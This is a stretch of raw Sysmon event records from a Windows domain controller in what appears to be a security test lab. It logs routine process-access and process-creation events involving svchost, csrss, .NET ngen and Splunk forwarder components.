13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9148-6005-4802-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9148-6005-4802-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.079{59A5CD1D-9148-6005-4802-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.047{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9148-6005-4702-00000000A301}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.032{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9148-6005-4702-00000000A301}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.032{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9148-6005-4702-00000000A301}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9149-6005-4D02-00000000A301}1184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9149-6005-4D02-00000000A301}1184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9149-6005-4D02-00000000A301}1184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.877{59A5CD1D-9149-6005-4D02-00000000A301}1184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 